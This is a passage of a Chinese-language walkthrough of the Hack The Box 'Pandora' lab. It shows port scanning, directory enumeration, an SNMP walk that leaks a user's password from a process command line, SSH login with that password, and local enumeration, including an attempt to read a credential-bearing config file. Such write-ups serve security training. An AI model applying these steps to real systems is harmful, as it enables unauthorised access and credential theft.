Pandora-htb-writeup

0x00 靶场技能介绍

章节技能：snmp信息泄露、SSH端口转发、CVE-2020-5844漏洞利用、CVE-2021-32099漏洞利用、tar环境变量错配利用

参考链接：https://0xdf.gitlab.io/2022/05/21/htb-pandora.html

参考链接：https://siunam321.github.io/ctf/hackthebox/Pandora/

0x01 用户权限获取

1、获取下靶机IP地址：10.10.11.136

2、测试下靶机的连通率

┌──(kali㉿kali)-[~/桌面]
└─$ ping 10.10.11.136 -c 4                                          
PING 10.10.11.136 (10.10.11.136) 56(84) bytes of data.
64 bytes from 10.10.11.136: icmp_seq=1 ttl=63 time=286 ms
64 bytes from 10.10.11.136: icmp_seq=2 ttl=63 time=275 ms
64 bytes from 10.10.11.136: icmp_seq=3 ttl=63 time=285 ms
64 bytes from 10.10.11.136: icmp_seq=4 ttl=63 time=383 ms

--- 10.10.11.136 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 275.412/307.245/383.245/44.061 ms

3、扫描下靶机开放端口信息

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.11.136
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-27 09:09 CST
Nmap scan report for 10.10.11.136
Host is up (0.30s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 10.32 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80 -Pn --min-rate=10000 10.10.11.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-27 09:09 CST
Nmap scan report for 10.10.11.136
Host is up (0.28s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.10 seconds

4、这里查看下网站首页文件

5、首页存在一个域名，我们做一下hosts绑定

1
2
3

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.11.136 panda.htb" | sudo tee -a /etc/hosts
10.10.11.136 panda.htb

6、开启目录扫描

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://panda.htb/                     
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_panda.htb/__23-12-27_09-15-43.txt

Target: http://panda.htb/

[09:15:43] Starting: 
[09:15:55] 403 -  274B  - /.ht_wsr.txt                                      
[09:15:55] 403 -  274B  - /.htaccess.bak1                                   
[09:15:56] 403 -  274B  - /.htaccess.orig                                   
[09:15:56] 403 -  274B  - /.htaccess.sample
[09:15:56] 403 -  274B  - /.htaccess.save
[09:15:56] 403 -  274B  - /.htaccess_extra                                  
[09:15:56] 403 -  274B  - /.htaccess_orig
[09:15:56] 403 -  274B  - /.htaccess_sc
[09:15:56] 403 -  274B  - /.htaccessBAK
[09:15:56] 403 -  274B  - /.htaccessOLD
[09:15:56] 403 -  274B  - /.htaccessOLD2
[09:15:56] 403 -  274B  - /.htm                                             
[09:15:56] 403 -  274B  - /.html
[09:15:56] 403 -  274B  - /.htpasswd_test                                   
[09:15:56] 403 -  274B  - /.htpasswds                                       
[09:15:56] 403 -  274B  - /.httr-oauth
[09:16:00] 403 -  274B  - /.php                                             
[09:16:47] 200 -  476B  - /assets/                                          
[09:16:47] 301 -  307B  - /assets  ->  http://panda.htb/assets/             
[09:18:04] 403 -  274B  - /server-status                                    
[09:18:04] 403 -  274B  - /server-status/ 

Task Completed

┌──(kali㉿kali)-[~/桌面]
└─$ gobuster dir -u http://panda.htb/ --wordlist=/usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://panda.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 274]
/.hta                 (Status: 403) [Size: 274]
/.htpasswd            (Status: 403) [Size: 274]
/assets               (Status: 301) [Size: 307] [--> http://panda.htb/assets/]
/index.html           (Status: 200) [Size: 33560]
/server-status        (Status: 403) [Size: 274]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

7、没有什么有用的收获，这里继续做一下子域名挖掘查看

┌──(kali㉿kali)-[~/桌面]
└─$ gobuster dns -d panda.htb -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     panda.htb
[+] Threads:    10
[+] Timeout:    1s
[+] Wordlist:   /usr/share/dnsrecon/subdomains-top1mil-5000.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Progress: 5000 / 5001 (99.98%)
===============================================================
Finished
===============================================================

8、这里同样没有什么收获，且我各种网站的信息检索也没有发现什么有用的信息，但是我在端口收集的时候少了一个udp的扫描，这里的扫描，发现了一些信息

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sU 10.10.11.136 -p- --min-rate=10000            
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-27 09:46 CST
Warning: 10.10.11.136 giving up on port because retransmission cap hit (10).
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.29s latency).
Not shown: 65455 open|filtered udp ports (no-response), 79 closed udp ports (port-unreach)
PORT    STATE SERVICE
161/udp open  snmp

Nmap done: 1 IP address (1 host up) scanned in 74.51 seconds

9、这里发现了snmp协议，这里可以获取到很多信息

SNMP - 简单网络管理协议是一种用于监控网络中不同设备（如路由器、交换机、打印机、物联网……）的协议。

为了确保 SNMP 访问能够跨制造商和不同的客户端-服务器组合工作，创建了管理信息库 (MIB) 。MIB是一种用于存储设备信息的独立格式。MIB 是一个文本文件，其中设备的所有可查询SNMP 对象都以标准化树形层次结构列出。它至少包含一个 **Object Identifier** ( **OID**)，除了必要的唯一地址和名称Abstract Syntax Notation One之外，还提供有关类型、访问权限的信息，以及以基于( ASN.1) 的 ASCII 文本格式编写的各个对象 MIB 文件的描述。MIB不包含数据，但它们解释了在哪里可以找到哪些信息及其外观、返回特定 OID 的值或使用哪种数据类型。

OID代表对象ID实体。OID 唯一地标识 MIB 层次结构中的托管对象。这可以被描述为一棵树，其级别由不同的组织分配。顶级 MIB 对象 ID (OID) 属于不同的标准组织。供应商定义私有分支，包括其自己产品的托管对象。

https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp

10、我们这里使用 snmpwalk 工具进行信息收集

┌──(kali㉿kali)-[~/桌面]
└─$ snmpwalk -c public -v1 10.10.11.136
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (637780) 1:46:17.80
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.25.4.2.1.4.488 = STRING: "/lib/systemd/systemd-journald"
iso.3.6.1.2.1.25.4.2.1.4.515 = STRING: "/lib/systemd/systemd-udevd"
iso.3.6.1.2.1.25.4.2.1.4.527 = STRING: "/lib/systemd/systemd-networkd"
iso.3.6.1.2.1.25.4.2.1.4.568 = ""
iso.3.6.1.2.1.25.4.2.1.4.658 = ""
iso.3.6.1.2.1.25.4.2.1.4.659 = ""
iso.3.6.1.2.1.25.4.2.1.4.660 = ""
iso.3.6.1.2.1.25.4.2.1.4.661 = ""
iso.3.6.1.2.1.25.4.2.1.4.662 = STRING: "/sbin/multipathd"
iso.3.6.1.2.1.25.4.2.1.4.670 = ""
iso.3.6.1.2.1.25.4.2.1.4.671 = ""
iso.3.6.1.2.1.25.4.2.1.4.682 = STRING: "/lib/systemd/systemd-resolved"
iso.3.6.1.2.1.25.4.2.1.4.684 = STRING: "/lib/systemd/systemd-timesyncd"
iso.3.6.1.2.1.25.4.2.1.4.702 = STRING: "/usr/bin/VGAuthService"
iso.3.6.1.2.1.25.4.2.1.4.711 = STRING: "/usr/bin/vmtoolsd"
iso.3.6.1.2.1.25.4.2.1.4.756 = STRING: "/usr/lib/accountsservice/accounts-daemon"
iso.3.6.1.2.1.25.4.2.1.4.758 = STRING: "/usr/bin/dbus-daemon"
iso.3.6.1.2.1.25.4.2.1.4.779 = STRING: "/usr/sbin/irqbalance"
iso.3.6.1.2.1.25.4.2.1.4.780 = STRING: "/usr/bin/python3"
iso.3.6.1.2.1.25.4.2.1.4.781 = STRING: "/usr/sbin/rsyslogd"
iso.3.6.1.2.1.25.4.2.1.4.789 = STRING: "/lib/systemd/systemd-logind"
iso.3.6.1.2.1.25.4.2.1.4.790 = STRING: "/usr/lib/udisks2/udisksd"
iso.3.6.1.2.1.25.4.2.1.4.828 = STRING: "/usr/sbin/cron"
iso.3.6.1.2.1.25.4.2.1.4.832 = STRING: "/usr/sbin/CRON"
iso.3.6.1.2.1.25.4.2.1.4.847 = STRING: "/bin/sh"
iso.3.6.1.2.1.25.4.2.1.4.856 = STRING: "/usr/sbin/atd"
iso.3.6.1.2.1.25.4.2.1.4.860 = STRING: "/usr/sbin/snmpd"
iso.3.6.1.2.1.25.4.2.1.4.864 = STRING: "sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups"
iso.3.6.1.2.1.25.4.2.1.4.937 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.940 = STRING: "/usr/lib/policykit-1/polkitd"
iso.3.6.1.2.1.25.4.2.1.4.951 = STRING: "/sbin/agetty"
iso.3.6.1.2.1.25.4.2.1.4.982 = STRING: "/usr/sbin/mysqld"
iso.3.6.1.2.1.25.4.2.1.4.1112 = STRING: "/usr/bin/host_check"
iso.3.6.1.2.1.25.4.2.1.4.1389 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.2055 = STRING: "/usr/libexec/fwupd/fwupd"
iso.3.6.1.2.1.25.4.2.1.4.2063 = STRING: "/usr/lib/upower/upowerd"
iso.3.6.1.2.1.25.4.2.1.4.2188 = ""
iso.3.6.1.2.1.25.4.2.1.4.2270 = ""
iso.3.6.1.2.1.25.4.2.1.4.2311 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.2353 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.2365 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.2373 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.2384 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.2458 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.2481 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.2519 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.2520 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.5.758 = STRING: "--system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only"
iso.3.6.1.2.1.25.4.2.1.5.779 = STRING: "--foreground"
iso.3.6.1.2.1.25.4.2.1.5.780 = STRING: "/usr/bin/networkd-dispatcher --run-startup-triggers"
iso.3.6.1.2.1.25.4.2.1.5.781 = STRING: "-n -iNONE"
iso.3.6.1.2.1.25.4.2.1.5.789 = ""
iso.3.6.1.2.1.25.4.2.1.5.790 = ""
iso.3.6.1.2.1.25.4.2.1.5.828 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.832 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.847 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.856 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.860 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.864 = ""
iso.3.6.1.2.1.25.4.2.1.5.937 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.940 = STRING: "--no-debug"
iso.3.6.1.2.1.25.4.2.1.5.951 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.982 = ""
iso.3.6.1.2.1.25.4.2.1.5.1112 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.1389 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.2055 = ""
iso.3.6.1.2.1.25.4.2.1.5.2063 = ""
iso.3.6.1.2.1.25.4.2.1.5.2188 = ""
iso.3.6.1.2.1.25.4.2.1.5.2270 = ""
iso.3.6.1.2.1.25.4.2.1.5.2311 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.2353 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.2365 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.2373 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.2384 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.2458 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.2481 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.2519 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.2520 = STRING: "-k start"

11、这里我们获取到了一个账号密码信息

1	`STRING: "-u daniel -p HotelBabylon23"`

12、我们使用获取到的信息进行登录系统

┌──(kali㉿kali)-[~/桌面]
└─$ ssh daniel@10.10.11.136                     
The authenticity of host '10.10.11.136 (10.10.11.136)' can't be established.
ED25519 key fingerprint is SHA256:yDtxiXxKzUipXy+nLREcsfpv/fRomqveZjm6PXq9+BY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.136' (ED25519) to the list of known hosts.
daniel@10.10.11.136's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 27 Dec 03:13:17 UTC 2023

  System load:           0.0
  Usage of /:            63.1% of 4.87GB
  Memory usage:          9%
  Swap usage:            0%
  Processes:             236
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.136
  IPv6 address for eth0: dead:beef::250:56ff:feb9:af3

  => /boot is using 91.8% of 219MB

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

daniel@pandora:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel)
daniel@pandora:~$ pwd
/home/daniel
daniel@pandora:~$ ls
daniel@pandora:~$ ls -la /home
total 16
drwxr-xr-x  4 root   root   4096 Dec  7  2021 .
drwxr-xr-x 18 root   root   4096 Dec  7  2021 ..
drwxr-xr-x  4 daniel daniel 4096 Dec 27 03:13 daniel
drwxr-xr-x  2 matt   matt   4096 Dec  7  2021 matt
daniel@pandora:~$

13、但是可以发现，第一个flag信息，并不在这个用户下的。

14、以下是我一系列的信息枚举过程

daniel@pandora:~$ ss -lt
State             Recv-Q            Send-Q                       Local Address:Port                         Peer Address:Port           Process            
LISTEN            0                 4096                         127.0.0.53%lo:domain                            0.0.0.0:*                                 
LISTEN            0                 128                                0.0.0.0:ssh                               0.0.0.0:*                                 
LISTEN            0                 80                               127.0.0.1:mysql                             0.0.0.0:*                                 
LISTEN            0                 511                                      *:http                                    *:*                                 
LISTEN            0                 128                                   [::]:ssh                                  [::]:*                                 
daniel@pandora:~$ ls -lah /var/www/
total 16K
drwxr-xr-x  4 root root 4.0K Dec  7  2021 .
drwxr-xr-x 14 root root 4.0K Dec  7  2021 ..
drwxr-xr-x  3 root root 4.0K Dec  7  2021 html
drwxr-xr-x  3 matt matt 4.0K Dec  7  2021 pandora
daniel@pandora:~$ ls -la /var/www/html
total 48
drwxr-xr-x 3 root root  4096 Dec  7  2021 .
drwxr-xr-x 4 root root  4096 Dec  7  2021 ..
drwxr-xr-x 7 root root  4096 Dec  7  2021 assets
-rw-r--r-- 1 root root 33560 Dec  3  2021 index.html
daniel@pandora:~$ ls -la /var/www/pandora
total 16
drwxr-xr-x  3 matt matt 4096 Dec  7  2021 .
drwxr-xr-x  4 root root 4096 Dec  7  2021 ..
-rw-r--r--  1 matt matt   63 Jun 11  2021 index.html
drwxr-xr-x 16 matt matt 4096 Dec  7  2021 pandora_console
daniel@pandora:~$ ls -la /var/www/pandora/pandora_console/
total 1596
drwxr-xr-x 16 matt matt    4096 Dec  7  2021 .
drwxr-xr-x  3 matt matt    4096 Dec  7  2021 ..
-rw-r--r--  1 matt matt    3746 Jan  3  2020 ajax.php
drwxr-xr-x  6 matt matt    4096 Dec  7  2021 attachment
-rw-r--r--  1 matt matt    1175 Jun 17  2021 audit.log
-rw-r--r--  1 matt matt     534 Jan  3  2020 AUTHORS
-rw-r--r--  1 matt matt     585 Jan  3  2020 composer.json
-rw-r--r--  1 matt matt   16003 Jan  3  2020 composer.lock
-rw-r--r--  1 matt matt   14875 May 17  2019 COPYING
-rw-r--r--  1 matt matt     506 Jan  3  2020 DB_Dockerfile
drwxr-xr-x  2 matt matt    4096 Dec  7  2021 DEBIAN
-rw-r--r--  1 matt matt    3366 Jan  3  2020 docker_entrypoint.sh
-rw-r--r--  1 matt matt    1263 Jan  3  2020 Dockerfile
drwxr-xr-x 11 matt matt    4096 Dec  7  2021 extensions
drwxr-xr-x  4 matt matt    4096 Dec  7  2021 extras
drwxr-xr-x  2 matt matt    4096 Dec  7  2021 fonts
drwxr-xr-x  5 matt matt    4096 Dec  7  2021 general
drwxr-xr-x 20 matt matt    4096 Dec  7  2021 godmode
drwxr-xr-x 21 matt matt   36864 Dec  7  2021 images
drwxr-xr-x 21 matt matt    4096 Dec  7  2021 include
-rw-r--r--  1 matt matt   52704 Dec  2  2021 index.php
-rw-r--r--  1 matt matt   42398 Jan  3  2020 install.done
drwxr-xr-x  5 matt matt    4096 Dec  7  2021 mobile
drwxr-xr-x 15 matt matt    4096 Dec  7  2021 operation
-rw-r--r--  1 matt matt    1302 Dec 27 01:06 pandora_console.log
-rw-r--r--  1 matt matt     234 May 17  2019 pandora_console_logrotate_centos
-rw-r--r--  1 matt matt     171 May 17  2019 pandora_console_logrotate_suse
-rw-r--r--  1 matt matt     222 May 17  2019 pandora_console_logrotate_ubuntu
-rw-r--r--  1 matt matt    4883 May 17  2019 pandora_console_upgrade
-rw-r--r--  1 matt matt 1168598 Jan  3  2020 pandoradb_data.sql
-rw-r--r--  1 matt matt  160283 Jan  3  2020 pandoradb.sql
-rw-r--r--  1 matt matt     476 Jan  3  2020 pandora_websocket_engine.service
drwxr-xr-x  3 matt matt    4096 Dec  7  2021 tests
drwxr-xr-x  2 matt matt    4096 Dec  7  2021 tools
drwxr-xr-x 11 matt matt    4096 Dec  7  2021 vendor
-rw-r--r--  1 matt matt    4856 Jan  3  2020 ws.php
daniel@pandora:~$ cat /var/www/pandora/pandora_console/DB_Dockerfile
FROM mysql:5.5
MAINTAINER Pandora FMS Team <info@pandorafms.com>

WORKDIR /pandorafms/pandora_console

ADD pandoradb.sql /docker-entrypoint-initdb.d
ADD pandoradb_data.sql /docker-entrypoint-initdb.d
RUN chown mysql /docker-entrypoint-initdb.d

ENV MYSQL_DATABASE=pandora

RUN echo " \n\
sed -i \"1iUSE \$MYSQL_DATABASE\" /docker-entrypoint-initdb.d/pandoradb.sql \n\
sed -i \"1iUSE \$MYSQL_DATABASE\" /docker-entrypoint-initdb.d/pandoradb_data.sql \n\
" >> /docker-entrypoint-initdb.d/create_pandoradb.sh
daniel@pandora:~$ cat /var/www/pandora/pandora_console/Dockerfile
FROM centos:centos6
MAINTAINER Pandora FMS Team <info@pandorafms.com>

RUN { \
        echo '[EPEL]'; \
        echo 'name = CentOS Epel'; \
        echo 'baseurl = http://dl.fedoraproject.org/pub/epel/6/x86_64'; \
        echo 'enabled=1'; \
        echo 'gpgcheck=0'; \
} > /etc/yum.repos.d/extra_repos.repo

RUN { \
        echo '[artica_pandorafms]'; \
        echo 'name=CentOS6 - PandoraFMS official repo'; \
        echo 'baseurl=http://artica.es/centos6'; \
        echo 'gpgcheck=0'; \
        echo 'enabled=1'; \
} > /etc/yum.repos.d/pandorafms.repo

RUN yum -y update; yum clean all;
RUN yum install -y \ 
        git \
        httpd \
        cronie \
        ntp \
        openldap \
        nfdump \
        wget \
        curl \
        openldap \
        plymouth \
        xterm \
        php \ 
        php-gd \ 
        graphviz \ 
        php-mysql \ 
        php-pear-DB \ 
        php-pear \
        php-pdo \
        php-mbstring \ 
        php-ldap \ 
        php-snmp \ 
        php-ldap \ 
        php-common \ 
        php-zip \ 
        nmap \
        net-snmp-utils \
        mod_ssl \
        xprobe2

#Clone the repo
RUN git clone -b develop https://github.com/pandorafms/pandorafms.git /tmp/pandorafms

#Exposing ports for: HTTP, SNMP Traps, Tentacle protocol
EXPOSE 80 162/udp 443 41121

# Simple startup script to avoid some issues observed with container restart
ADD docker_entrypoint.sh /entrypoint.sh
RUN chmod -v +x /entrypoint.sh

CMD ["/entrypoint.sh"]

daniel@pandora:~$ cat /var/www/pandora/pandora_console/docker_entrypoint.sh
#!/bin/bash
set -e
if [ -n "$MYSQL_PORT_3306_TCP" ]; then
                if [ -z "$PANDORA_DB_HOST" ]; then
                        PANDORA_DB_HOST='mysql'
                else
                        echo >&2 'warning: both PANDORA_DB_HOST and MYSQL_PORT_3306_TCP found'
                        echo >&2 "  Connecting to PANDORA_DB_HOST ($PANDORA_DB_HOST)"
                        echo >&2 '  instead of the linked mysql container'
                fi
fi

if [ -z "$PANDORA_DB_HOST" ]; then
        echo >&2 'error: missing PANDORA_DB_HOST and MYSQL_PORT_3306_TCP environment variables'
        echo >&2 '  Did you forget to --link some_mysql_container:mysql or set an external db'
        echo >&2 '  with -e PANDORA_DB_HOST=hostname:port?'
        exit 1
fi

# if we're linked to MySQL and thus have credentials already, let's use them
: ${PANDORA_DB_USER:=${MYSQL_ENV_MYSQL_USER:-root}}
if [ "$PANDORA_DB_USER" = 'root' ]; then
        : ${PANDORA_DB_PASSWORD:=$MYSQL_ENV_MYSQL_ROOT_PASSWORD}
fi
: ${PANDORA_DB_PASSWORD:=$MYSQL_ENV_MYSQL_PASSWORD}
if [ -z "$PANDORA_DB_NAME" ]; then
        : ${PANDORA_DB_NAME:=${MYSQL_ENV_MYSQL_DATABASE:-pandora}}
fi

if [ -z "$PANDORA_DB_PASSWORD" ]; then
        echo >&2 'error: missing required PANDORA_DB_PASSWORD environment variable'
        echo >&2 '  Did you forget to -e PANDORA_DB_PASSWORD=... ?'
        echo >&2
        echo >&2 '  (Also of interest might be PANDORA_DB_USER and PANDORA_DB_NAME.)'
        exit 1
fi

mv -f /tmp/pandorafms/pandora_console /var/www/html
cd /var/www/html/pandora_console/include
cat > config.php <<- 'EOF'
<?php
$config["dbtype"] = "mysql";
$config["homedir"]="/var/www/html/pandora_console";             // Config homedir
$config["homeurl"]="/pandora_console";                  // Base URL
$config["homeurl_static"]="/pandora_console";                   // Don't  delete
error_reporting(E_ALL);
$ownDir = dirname(__FILE__) . DIRECTORY_SEPARATOR;
EOF

echo "\$config[\"dbname\"]=\"$PANDORA_DB_NAME\";" >> config.php
echo "\$config[\"dbuser\"]=\"$PANDORA_DB_USER\";" >> config.php
echo "\$config[\"dbpass\"]=\"$PANDORA_DB_PASSWORD\";" >> config.php
echo "\$config[\"dbhost\"]=\"$PANDORA_DB_HOST\";" >> config.php
echo "include (\$ownDir . \"config_process.php\");" >> config.php
echo "?>" >> config.php

echo "Granting apache permissions to the console directory"
chown -R apache:apache /var/www/html/pandora_console
chmod 600 /var/www/html/pandora_console/include/config.php

# Customize php.iniA
echo "Configuring Pandora FMS elements and depending services"
sed "s/.*error_reporting =.*/error_reporting = E_ALL \& \~E_DEPRECATED \& \~E_NOTICE \& \~E_USER_WARNING/" /etc/php.ini > /tmp/php.ini && mv /tmp/php.ini /etc/php.ini
sed "s/.*max_execution_time =.*/max_execution_time = 0/" /etc/php.ini > /tmp/php.ini && mv /tmp/php.ini /etc/php.ini
sed "s/.*max_input_time =.*/max_input_time = -1/" /etc/php.ini > /tmp/php.ini && mv /tmp/php.ini /etc/php.ini
sed "s/.*upload_max_filesize =.*/upload_max_filesize = 800M/" /etc/php.ini > /tmp/php.ini && mv /tmp/php.ini /etc/php.ini
sed "s/.*memory_limit =.*/memory_limit = 500M/" /etc/php.ini > /tmp/php.ini && mv /tmp/php.ini /etc/php.ini
sed "s/.*post_max_size =.*/post_max_size = 100M/" /etc/php.ini > /tmp/php.ini && mv /tmp/php.ini /etc/php.ini

cd /var/www/html/pandora_console && mv -f install.php install.php.done

#Create the pandora user
/usr/sbin/useradd -d /home/pandora -s /bin/false -M -g 0 pandora

#Rock n' roll!
/etc/init.d/crond start &
/etc/init.d/ntpd start &

rm -rf /run/httpd/*
exec /usr/sbin/apachectl -D FOREGROUND
daniel@pandora:~$ cat /var/www/pandora/pandora_console/include/con
config.inc.php      config.php          config_process.php  constants.php       
daniel@pandora:~$ cat /var/www/pandora/pandora_console/include/config.
config.inc.php  config.php      
daniel@pandora:~$ cat /var/www/pandora/pandora_console/include/config.php 
cat: /var/www/pandora/pandora_console/include/config.php: Permission denied
daniel@pandora:~$ ls -la /var/www/pandora/pandora_console/include/
total 4184
drwxr-xr-x 21 matt matt   4096 Dec  7  2021 .
drwxr-xr-x 16 matt matt   4096 Dec  7  2021 ..
drwxr-xr-x  2 matt matt   4096 Dec  7  2021 ajax
-rw-r--r--  1 matt matt  10817 Jan  3  2020 api.php
drwxr-xr-x  3 matt matt   4096 Dec  7  2021 auth
drwxr-xr-x  2 matt matt   4096 Dec  7  2021 browscap
-rw-r--r--  1 matt matt  83565 May 17  2019 calendar.js
-rw-r--r--  1 matt matt  11133 Jan  3  2020 chart_generator.php
drwxr-xr-x  2 matt matt   4096 Dec  7  2021 class
-rw-r--r--  1 matt matt   1208 Jan  3  2020 config.inc.php
-rw-------  1 matt matt    413 Dec  3  2021 config.php
-rw-r--r--  1 matt matt   9455 Jan  3  2020 config_process.php
-rw-r--r--  1 matt matt  20304 Jan  3  2020 constants.php
drwxr-xr-x  2 matt matt   4096 Dec  7  2021 db
drwxr-xr-x  5 matt matt   4096 Dec  7  2021 ehorus
drwxr-xr-x  2 matt matt   4096 Dec  7  2021 fonts
-rw-r--r--  1 matt matt 103508 Jan  3  2020 functions_agents.php
-rw-r--r--  1 matt matt  74014 Jan  3  2020 functions_alerts.php
-rw-r--r--  1 matt matt 533199 Jan  3  2020 functions_api.php
-rw-r--r--  1 matt matt   2268 Jan  3  2020 functions_categories.php
-rw-r--r--  1 matt matt   8790 Jan  3  2020 functions_clippy.php
-rw-r--r--  1 matt matt   2354 Jan  3  2020 functions_component_groups.php
-rw-r--r--  1 matt matt 125584 Jan  3  2020 functions_config.php
